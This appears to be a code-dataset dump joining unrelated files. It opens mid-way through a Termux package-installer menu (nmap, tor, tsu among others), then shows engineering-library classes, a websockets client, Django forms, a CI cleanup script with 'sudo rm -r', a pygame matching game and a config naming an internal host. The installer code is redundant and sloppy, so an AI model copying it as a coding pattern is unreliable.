os.system ("apt install ruby -y")
os.system ("pkg upgrade ruby -y")
os.system ("apt upgrade ruby -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '16' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install dnsutils -y")
os.system ("apt install dnsutils -y")
os.system ("pkg upgrade dnsutils -y")
os.system ("apt upgrade dnsutils -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '17' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install coreutils -y")
os.system ("apt install coreutils -y")
os.system ("pkg upgrade coreutils -y")
os.system ("apt upgrade coreutils -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '18' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install fish -y")
os.system ("apt install fish -y")
os.system ("pkg upgrade fish -y")
os.system ("apt upgrade fish -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '19' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install zip -y")
os.system ("apt install zip -y")
os.system ("pkg upgrade zip -y")
os.system ("apt upgrade zip -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '20' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install figlet -y")
os.system ("apt install figlet -y")
os.system ("pkg upgrade figlet -y")
os.system ("apt upgrade figlet -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '21' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install cowsay -y")
os.system ("apt install cowsay -y")
os.system ("pkg upgrade cowsay -y")
os.system ("apt upgrade cowsay -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '22' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install unzip -y")
os.system ("apt install unzip -y")
os.system ("pkg upgrade unzip -y")
os.system ("apt upgrade unzip -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '23' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install vim -y")
os.system ("apt install vim -y")
os.system ("pkg upgrade vim -y")
os.system ("apt upgrade vim -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '24' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install wcalc -y")
os.system ("apt install wcalc -y")
os.system ("pkg upgrade wcalc -y")
os.system ("apt upgrade wcalc -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '25' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install bmon -y")
os.system ("apt install bmon -y")
os.system ("pkg upgrade bmon -y")
os.system ("apt upgrade bmon -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '26' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install unrar -y")
os.system ("apt install unrar -y")
os.system ("pkg upgrade unrar -y")
os.system ("apt upgrade unrar -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '27' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install proot -y")
os.system ("apt install proot -y")
os.system ("pkg upgrade proot -y")
os.system ("apt upgrade proot -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '28' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install golang -y")
os.system ("apt install golang -y")
os.system ("pkg upgrade golang -y")
os.system ("apt upgrade golang -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '29' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system("pkg install tsu -y")
os.system ("apt install tsu -y")
os.system ("pkg upgrade tsu -y")
os.system ("apt upgrade tsu -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '30' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install tor")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '31' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system ("pkg install php -y")
os.system ("pkg upgrade php -y")
os.system ("apt install php -y")
os.system ("apt upgrade php -y")
os.system ("termux-setup-storage")
sys.exit ()
if choice == '00' : os.system ("apt upgrade -y")
os.system ("pkg install")
os.system ("pkg upgrade")
os.system ("apt install")
os.system ("apt upgrade")
os.system ("apt update")
os.system ("pkg update")
os.system("python -m pip install --upgrade pip")
os.system ("pip3 install --upgrade setuptools pip")
os.system ("pkg install python -y")
os.system ("pkg upgrade python -y")
os.system ("apt install python -y")
os.system ("apt upgrade python -y")
os.system ("pkg install python2 -y")
os.system ("pkg upgrade python2 -y")
os.system ("apt install python2 -y")
os.system ("apt upgrade python2 -y")
os.system ("pkg install php -y")
os.system ("pkg upgrade php -y")
os.system ("apt install php -y")
os.system ("apt upgrade php -y")
os.system ("pkg install bash")
os.system ("apt install bash")
os.system ("pkg upgrade bash")
os.system ("apt upgrade bash")
os.system ("apt install git -y")
os.system ("pkg install git -y")
os.system ("pkg upgrade git -y")
os.system ("apt upgrade git -y")
os.system ("pkg install perl -y")
os.system ("apt install perl -y")
os.system ("pkg upgrade perl -y")
os.system ("apt upgrade perl -y")
os.system ("pkg install nano -y")
os.system ("apt install nano -y")
os.system ("pkg upgrade nano -y")
os.system ("apt upgrade nano -y")
os.system ("pkg install curl -y")
os.system ("apt install curl -y")
os.system ("pkg upgrade curl -y")
os.system ("apt upgrade curl -y")
os.system ("pkg install openssl -y")
os.system ("apt install openssl -y")
os.system ("pkg upgrade openssl -y")
os.system ("apt upgrade openssl -y")
os.system ("pkg install openssh -y")
os.system ("apt install openssh -y")
os.system ("pkg upgrade openssh -y")
os.system ("apt upgrade openssh -y")
os.system ("pkg install wget -y")
os.system ("apt install wget -y")
os.system ("pkg upgrade wget -y")
os.system ("apt upgrade wget -y")
os.system ("pkg install clang -y")
os.system ("apt install clang -y")
os.system ("pkg upgrade clang -y")
os.system ("apt upgrade clang -y")
os.system ("pkg install nmap -y")
os.system ("apt install nmap -y")
os.system ("pkg upgrade nmap -y")
os.system ("apt upgrade nmap -y")
os.system ("pkg install w3m -y")
os.system ("apt install w3m -y")
os.system ("pkg upgrade w3m -y")
os.system ("apt upgrade w3m -y")
os.system ("pkg install ruby -y")
os.system ("apt install ruby -y")
os.system ("pkg upgrade ruby -y")
os.system ("apt upgrade ruby -y")
os.system ("pkg install dnsutils -y")
os.system ("apt install dnsutils -y")
os.system ("pkg upgrade dnsutils -y")
os.system ("apt upgrade dnsutils -y")
os.system ("pkg install coreutils -y")
os.system ("apt install coreutils -y")
os.system ("pkg upgrade coreutils -y")
os.system ("apt upgrade coreutils -y")
os.system ("pkg install fish -y")
os.system ("apt install fish -y")
os.system ("pkg upgrade fish -y")
os.system ("apt upgrade fish -y")
os.system ("pkg install zip -y")
os.system ("apt install zip -y")
os.system ("pkg upgrade zip -y")
os.system ("apt upgrade zip -y")
os.system ("pkg install figlet -y")
os.system ("apt install figlet -y")
os.system ("pkg upgrade figlet -y")
os.system ("apt upgrade figlet -y")
os.system ("pkg install cowsay -y")
os.system ("apt install cowsay -y")
os.system ("pkg upgrade cowsay -y")
os.system ("apt upgrade cowsay -y")
os.system ("pkg install unzip -y")
os.system ("apt install unzip -y")
os.system ("pkg upgrade unzip -y")
os.system ("apt upgrade unzip -y")
os.system ("pkg install vim -y")
os.system ("apt install vim -y")
os.system ("pkg upgrade vim -y")
os.system ("apt upgrade vim -y")
os.system ("pkg install wcalc -y")
os.system ("apt install wcalc -y")
os.system ("pkg upgrade wcalc -y")
os.system ("apt upgrade wcalc -y")
os.system ("pkg install bmon -y")
os.system ("apt install bmon -y")
os.system ("pkg upgrade bmon -y")
os.system ("apt upgrade bmon -y")
os.system ("pkg install unrar -y")
os.system ("apt install unrar -y")
os.system ("pkg upgrade unrar -y")
os.system ("apt upgrade unrar -y")
os.system ("pkg install proot -y")
os.system ("apt install proot -y")
os.system ("pkg upgrade proot -y")
os.system ("apt upgrade proot -y")
os.system ("pkg install golang -y")
os.system ("apt install golang -y")
os.system ("pkg upgrade golang -y")
os.system ("apt upgrade golang -y")
os.system("pkg install tsu -y")
os.system ("apt install tsu -y")
os.system ("pkg upgrade tsu -y")
os.system ("apt upgrade tsu -y")
os.system ("pkg install tor")
os.system ("termux-setup-storage")
sys.exit () | 2.421875 | 2 |
RFEM/Loads/solidSetLoad.py | DavidNaizheZhou/RFEM_Python_Client | 16 | 11058 | <reponame>DavidNaizheZhou/RFEM_Python_Client<gh_stars>10-100
from RFEM.initModel import Model, clearAtributes, ConvertToDlString
from RFEM.enums import SolidSetLoadType, SolidSetLoadDistribution, SolidSetLoadDirection
class SolidSetLoad():
def __init__(self,
no: int =1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_type = SolidSetLoadType.LOAD_TYPE_FORCE,
load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE,
magnitude: float = 0,
comment: str = '',
params: dict = {}):
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = load_type.name
# Load Distribution
clientObject.load_distribution = load_distribution.name
# Load Direction
clientObject.load_direction = load_direction.name
# Load Magnitude
clientObject.uniform_magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Force(self,
no: int =1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_direction = SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE,
magnitude: float = 0,
comment: str = '',
params: dict = {}):
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_FORCE.name
# Load Distribution
clientObject.load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Load Direction
clientObject.load_direction = load_direction.name
# Load Magnitude
clientObject.uniform_magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Temperature(self,
no: int = 1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_parameter = None,
comment: str = '',
params: dict = {}):
'''
load_parameter:
LOAD_DISTRIBUTION_UNIFORM: load_parameter = magnitude
LOAD_DISTRIBUTION_LINEAR_IN_X: load_parameter = [magnitude_1, magnitude_2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Y: load_parameter = [magnitude_1, magnitude_2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Z: load_parameter = [magnitude_1, magnitude_2, node_1, node_2]
params:
{''}
'''
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_TEMPERATURE.name
# Load Distribution
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM":
clientObject.uniform_magnitude = load_parameter
else:
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.node_1 = load_parameter[2]
clientObject.node_2 = load_parameter[3]
clientObject.load_distribution = load_distribution.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Strain(self,
no: int = 1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_distribution = SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_parameter = None,
comment: str = '',
params: dict = {}):
'''
load_parameter:
LOAD_DISTRIBUTION_UNIFORM: load_parameter = [strain_uniform_magnitude_x, strain_uniform_magnitude_y, strain_uniform_magnitude_z]
LOAD_DISTRIBUTION_LINEAR_IN_X: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Y: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2]
LOAD_DISTRIBUTION_LINEAR_IN_Z: load_parameter = [strain_magnitude_x1, strain_magnitude_y1, strain_magnitude_z1, strain_magnitude_x2, strain_magnitude_y2, strain_magnitude_z2, node_1, node_2]
params:
{''}
'''
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_STRAIN.name
# Load Distribution
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM":
clientObject.strain_uniform_magnitude_x = load_parameter[0]
clientObject.strain_uniform_magnitude_y = load_parameter[1]
clientObject.strain_uniform_magnitude_z = load_parameter[2]
else:
clientObject.strain_magnitude_x1 = load_parameter[0]
clientObject.strain_magnitude_y1 = load_parameter[1]
clientObject.strain_magnitude_z1 = load_parameter[2]
clientObject.strain_magnitude_x2 = load_parameter[3]
clientObject.strain_magnitude_y2 = load_parameter[4]
clientObject.strain_magnitude_z2 = load_parameter[5]
clientObject.node_1 = load_parameter[6]
clientObject.node_2 = load_parameter[7]
clientObject.load_distribution = load_distribution.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
def Motion(self,
no: int = 1,
load_case_no: int = 1,
solid_sets_no: str= '1',
load_parameter = None,
comment: str = '',
params: dict = {}):
'''
load_parameter:
load_parameter = [angular_velocity, angular_acceleration, axis_definition_p1_x, axis_definition_p1_y, axis_definition_p1_z, axis_definition_p2_x, axis_definition_p2_y, axis_definition_p2_z]
params:
{''}
'''
# Client model | Solid Load
clientObject = Model.clientModel.factory.create('ns0:solid_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Assigned Solid No.
clientObject.solid_sets = ConvertToDlString(solid_sets_no)
# Load Type
clientObject.load_type = SolidSetLoadType.LOAD_TYPE_ROTARY_MOTION.name
# Velocity
clientObject.angular_velocity = load_parameter[0]
# Acceleration
clientObject.angular_acceleration = load_parameter[1]
# Axis Definition
clientObject.axis_definition_p1_x = load_parameter[2]
clientObject.axis_definition_p1_y = load_parameter[3]
clientObject.axis_definition_p1_z = load_parameter[4]
clientObject.axis_definition_p2_x = load_parameter[5]
clientObject.axis_definition_p2_y = load_parameter[6]
clientObject.axis_definition_p2_z = load_parameter[7]
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Solid Load to client model
Model.clientModel.service.set_solid_set_load(load_case_no, clientObject)
#def Buoyancy():
# print('The function Buoyancy() is not implemented yet.')
#def Gas():
# print('The function Gas() is not implemented yet.')
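# --- Editor's note: illustrative call sketch, not runnable without an open RFEM model and an
# --- active Model connection; every parameter value below is made up.
# SolidSetLoad(no=1, load_case_no=1, solid_sets_no='1',
#              load_type=SolidSetLoadType.LOAD_TYPE_FORCE,
#              load_distribution=SolidSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
#              load_direction=SolidSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE,
#              magnitude=5000)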
| 2.265625 | 2 |
examples_2d/patch.py | 5A5H/PyFEMP | 1 | 11059 | <gh_stars>1-10
# 2D example tensile test
import numpy as np
import matplotlib.pyplot as plt
import PyFEMP
import PyFEMP.elements.Elmt_BaMo_2D as ELEMENT
FEM = PyFEMP.FEM_Simulation(ELEMENT)
n = 4
XI, Elem = PyFEMP.msh_rec([0.0, 0.0], [10.0, 10.0], [n, n], type='Q1')
FEM.Add_Mesh(XI, Elem)
FEM.Add_Material([2100, 0.3], "All")
FEM.Add_EBC("x==0", "UX", 0)
FEM.Add_EBC("y==0", "UY", 0)
FEM.Add_EBC("x==10", "UX", 1)
FEM.Analysis()
FEM.NextStep(1.0, 1.0)
print( FEM.NewtonIteration() )
print( FEM.NewtonIteration() )
ux = FEM.NodalDof("x==10 and y==10", "UX")
uy = FEM.NodalDof("x==10 and y==10", "UY")
print('ux :',ux, 'uy :',uy)
fig, ax = plt.subplots(1,1, figsize=(8.0, 8.0))
postplot = FEM.ShowMesh(ax, ec='b', label='reference config.')
postplot = FEM.ShowMesh(ax, deformedmesh=True, ec='r', label='current config.')
ax.legend()
plt.show() | 2.5 | 2 |
common-patterns/producer_consumer_client.py | kyeett/websockets-examples | 0 | 11060 | <reponame>kyeett/websockets-examples
#!/usr/bin/env python
import asyncio
import websockets
import os
port = int(os.environ.get('PORT', '8765'))
async def hello():
print("Starting client on :%s" % port)
async with websockets.connect('ws://localhost:%s' % port) as websocket:
msg = 'Client msg #1'
await websocket.send(msg)
print('> {}'.format(msg))
i = 0
while True:
greeting = await websocket.recv()
i += 1
print("< {}".format(greeting))
asyncio.get_event_loop().run_until_complete(hello())
| 3.46875 | 3 |
wagtailflags/forms.py | cfpb/wagtail-flags | 75 | 11061 | <filename>wagtailflags/forms.py
from django import forms
from flags.forms import FlagStateForm as DjangoFlagsFlagStateForm
from flags.models import FlagState
from flags.sources import get_flags
class NewFlagForm(forms.ModelForm):
name = forms.CharField(label="Name", required=True)
def clean_name(self):
name = self.cleaned_data["name"]
if name in get_flags():
raise forms.ValidationError(
"Flag named {} already exists".format(name)
)
return name
def save(self, commit=True):
obj = super(NewFlagForm, self).save(commit=False)
obj.condition = "boolean"
obj.value = "False"
obj.required = False
obj.save()
return obj
class Meta:
model = FlagState
fields = ("name",)
class FlagStateForm(DjangoFlagsFlagStateForm):
name = forms.CharField(
label="Flag",
required=True,
disabled=True,
widget=forms.HiddenInput(),
)
class Meta:
model = FlagState
fields = ("name", "condition", "value", "required")
| 2.296875 | 2 |
src/utils/utils.py | GuiYuDaniel/CGC_of_Sn | 0 | 11062 | <reponame>GuiYuDaniel/CGC_of_Sn<filename>src/utils/utils.py
# -*- coding:utf8 -*-
"""
一些其他工具
当需要细化或者函数太多时,应该把其中一些独立出去
"""
import uuid
from enum import Enum, unique
from utils.log import get_logger
logger = get_logger(__name__)
@unique
class PipeTaskStatus(Enum):  # not enough here to justify a full state machine yet, so this Enum makes do for now
    """
    name is the current status
    value is the list of statuses it may transition to next
    """
    # TODO: add states such as STOPPING and WAITING once multithreading is supported
    # TODO: a None placeholder is used to dodge Enum's aliasing rule for equal values; None is meaningless and is not a state!
    PREPARATION = ["DOING", "FAIL"]  # preparation is the setup phase: compute and save everything needed to run; a pipetask that has not finished preparation cannot be restarted
DOING = ["SUCCESS", "FAIL", "RESTARTING"]
SUCCESS = []
FAIL = ["RESTARTING"]
    RESTARTING = ["DOING", "FAIL", None]  # restarting is the preparation phase for a restart; once ready it moves straight to DOING
# STOPPING = []
# WAITING = []
def new_id(is_log=True):
_id = str(uuid.uuid4())
if is_log:
logger.debug("new an id={} with uuid4 method".format(_id))
return _id
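# --- Editor's note: illustrative sketch, not part of the original module, showing how the Enum
# --- encodes allowed transitions: a status's value is the list of legal next states.
if __name__ == "__main__":
    current = PipeTaskStatus.DOING
    print(current.name, "->", current.value)                               # DOING -> ['SUCCESS', 'FAIL', 'RESTARTING']
    print("FAIL can restart:", "RESTARTING" in PipeTaskStatus.FAIL.value)  # True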
| 2.265625 | 2 |
extras/scripts/finish_ci.py | connornishijima/PixieChroma | 20 | 11063 | <reponame>connornishijima/PixieChroma
# This is just for GitHub, and is used to clean up leftover files after
# automatic testing has completed, and generate developer reports about
# anything left undocumented!
# run: "sudo python ./extras/scripts/finish_ci.py"
import os
import sys
os.system("sudo python ./extras/scripts/generate_doxygen_report.py")
os.system("sudo python ./extras/scripts/generate_keywords_report.py")
os.system("sudo python ./extras/scripts/generate_overview_report.py")
print("Cleaning up CI junk...")
os.system("ls .")
os.system("git add *")
os.system("sudo rm -r *.tar*")
os.system("sudo rm -r examples/*/build")
os.system("git commit -a -m 'Automated Cleanup'")
os.system("git push")
print("Done!" )
| 2.296875 | 2 |
matchingGame.py | VinnieM-3/MemoryGames | 0 | 11064 | import pygame
import random
pygame.init()
pygame.font.init()
class Card(object):
""" The Card Class """
def __init__(self, left, top, width, height,
back_color, front_color, solved_color,
display,
font_color, text_font, value=None):
self._rect = pygame.Rect(left, top, width, height)
self._display = display
self._back_color = back_color # color of card when face down
self._front_color = front_color # color of card when face up
self._solved_color = solved_color # color of card after it is matched
self._font_color = font_color
self._text_font = text_font
self._value = value # the number we are trying to match
self._unsolved = True # is set to false once matched
self._hidden = True # card is face down to start
self._times_seen = 0 # number of times player viewed card
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
@property
def times_seen(self):
return self._times_seen
def solved(self):
self._unsolved = False
pygame.draw.rect(self._display, self._solved_color, self._rect)
def is_unsolved(self):
return self._unsolved
def is_clicked(self, pos):
x_pos, y_pos = pos
return self._rect.collidepoint(x_pos, y_pos) # did player click on this card?
def is_hidden(self):
return self._hidden
def show_card(self):
self._hidden = False
self._times_seen += 1
pygame.draw.rect(self._display, self._front_color, self._rect)
text_surface = self._text_font.render(self._value, True, self._font_color)
self._display.blit(text_surface, (self._rect.center[0] - (text_surface.get_width() / 2),
self._rect.center[1] - (text_surface.get_height() / 2)))
def hide_card(self):
self._hidden = True
pygame.draw.rect(self._display, self._back_color, self._rect)
def get_matching_card(card_list, card_to_match):
""" This function returns the card that matches the one passed in """
the_matching_card = None
for test_card in card_list:
if test_card.value == card_to_match.value and test_card != card_to_match:
the_matching_card = test_card
break
return the_matching_card
def cards_remaining(card_list):
""" this function returns the number of cards that have not been matched yet """
num_remaining = 0
for c in card_list:
if c.is_unsolved():
num_remaining += 1
return num_remaining
if __name__ == "__main__":
display_width = 600
display_height = 600
card_font = pygame.font.SysFont('Comic Sans MS', 48)
front_col = pygame.Color('white')
solved_col = pygame.Color('#636363')
back_col = pygame.Color('#293a32')
font_col = pygame.Color('black')
score_font = pygame.font.SysFont('Comic Sans MS', 24)
score_txt_col = pygame.Color('#d4c38f')
score_y_margin = 50
score_x_margin = 20
player_closed_app = False
new_game = False
cards = []
game_display = pygame.display.set_mode((display_width, display_height))
pygame.display.set_caption('Matching Game')
game_display.fill(pygame.Color('#b5c9a6'))
score_rect = pygame.draw.rect(game_display, pygame.Color('black'), pygame.Rect(0, 0, display_width, score_y_margin))
surf_8x8_txt = score_font.render("8 x 8", True, score_txt_col)
left_pos = (game_display.get_width() - score_x_margin - surf_8x8_txt.get_width())
surf_8x8_rect = game_display.blit(surf_8x8_txt, (left_pos, (score_y_margin - surf_8x8_txt.get_height()) / 2))
surf_6x6_txt = score_font.render("6 x 6", True, score_txt_col)
left_pos = left_pos - surf_6x6_txt.get_width() - score_x_margin
surf_6x6_rect = game_display.blit(surf_6x6_txt, (left_pos, (score_y_margin - surf_6x6_txt.get_height()) / 2))
surf_4x4_txt = score_font.render("4 x 4", True, score_txt_col)
left_pos = left_pos - surf_4x4_txt.get_width() - score_x_margin
surf_4x4_rect = game_display.blit(surf_4x4_txt, (left_pos, (score_y_margin - surf_4x4_txt.get_height()) / 2))
surf_sel_txt = score_font.render("Select Game:", True, score_txt_col)
left_pos = left_pos - surf_sel_txt.get_width() - score_x_margin
game_display.blit(surf_sel_txt, (left_pos, (score_y_margin - surf_sel_txt.get_height()) / 2))
num_cols = 0
num_rows = 0
pick_1 = None # variable to hold first card selected by player
score = 0
max_score = 0 # maximum score a player can get
while not player_closed_app:
for event in pygame.event.get():
if event.type == pygame.QUIT:
player_closed_app = True
if new_game:
pygame.draw.rect(game_display, pygame.Color('#b5c9a6'),
pygame.Rect(0, score_y_margin, display_width, display_height - score_y_margin))
total_pairs = (num_cols * num_rows) / 2
max_score = total_pairs - 1 # player gets no credit for last two cards remaining
pairs = range(1, total_pairs + 1) + range(1, total_pairs + 1) # create numbered pairs
# calculate the width and height of the cards and the space between them
card_horz_width = int((display_width * 0.8) / num_cols)
space_horz_width = int((display_width * 0.2) / (num_cols + 1))
card_vert_height = int(((display_height - score_y_margin) * 0.8) / num_rows)
space_vert_height = int(((display_height - score_y_margin) * 0.2) / (num_rows + 1))
# create cards and randomly assign the numbered pairs
random.random()
del cards[:]
for row in range(1, num_rows + 1):
for col in range(1, num_cols + 1):
rnd_item = random.choice(pairs)
pairs.remove(rnd_item)
new_card_x = ((col - 1) * card_horz_width) + (col * space_horz_width)
new_card_y = ((row - 1) * card_vert_height) + (row * space_vert_height) + score_y_margin
crd = Card(new_card_x, new_card_y, card_horz_width, card_vert_height,
back_col, front_col, solved_col, game_display, font_col, card_font, str(rnd_item))
cards.append(crd)
crd.hide_card()
score = 0
new_game = False
if pygame.mouse.get_pressed()[0]:
if surf_4x4_rect.collidepoint(pygame.mouse.get_pos()): # start new game 4 x 4
new_game = True
num_cols = 4
num_rows = 4
pygame.time.wait(200) # wait 200ms to avoid multiple new game mouse click events
if surf_6x6_rect.collidepoint(pygame.mouse.get_pos()): # start new game 6 x 6
new_game = True
num_cols = 6
num_rows = 6
pygame.time.wait(200)
if surf_8x8_rect.collidepoint(pygame.mouse.get_pos()): # start new game 8 x 8
new_game = True
num_cols = 8
num_rows = 8
pygame.time.wait(200)
for crd in cards:
if crd.is_clicked(pygame.mouse.get_pos()) and crd.is_hidden() and crd.is_unsolved():
crd.show_card()
pygame.display.flip()
if pick_1 is None:
pick_1 = crd # player picked first card
else: # player picked second card.
if pick_1.value == crd.value: # it is a match!
pick_1.solved()
crd.solved()
if crd.times_seen > 1 and cards_remaining(cards) > 0:
score += 1 # if you have seen the matching card at least once before, you get a point
elif crd.times_seen == 1 and cards_remaining(cards) > 0:
max_score -= 1 # no points for luck, we just reduce the max possible score
pygame.time.wait(500) # show matching values for 500ms
else: # it did not match
pick_1.hide_card()
crd.hide_card()
matching_card = get_matching_card(cards, pick_1)
if matching_card.times_seen > 0:
score -= 1 # player has seen the matching card before! 1 point penalty!
if crd.times_seen > 1:
score -= 1 # player should have known this card was not a match! 1 point penalty!
pygame.time.wait(1500) # show card values for 1.5sec
pick_1 = None # get ready for next pair of selections by player
break
# update score
surf_wrong = score_font.render("Score = " + str(score) + " out of " + str(max_score), True, score_txt_col)
pygame.draw.rect(game_display, pygame.Color('black'),
pygame.Rect(score_x_margin, 0, surf_wrong.get_width() + 100, score_y_margin))
game_display.blit(surf_wrong, (score_x_margin, (score_y_margin - surf_wrong.get_height()) / 2))
pygame.display.flip()
    # player exited the application
pygame.quit()
quit()
| 3.578125 | 4 |
darts_search_space/imagenet/rlnas/evolution_search/config.py | megvii-model/RLNAS | 17 | 11065 | import os
class config:
host = 'zhangxuanyang.zhangxuanyang.ws2.hh-c.brainpp.cn'
username = 'admin'
port = 5672
exp_name = os.path.dirname(os.path.abspath(__file__))
exp_name = '-'.join(i for i in exp_name.split(os.path.sep) if i);
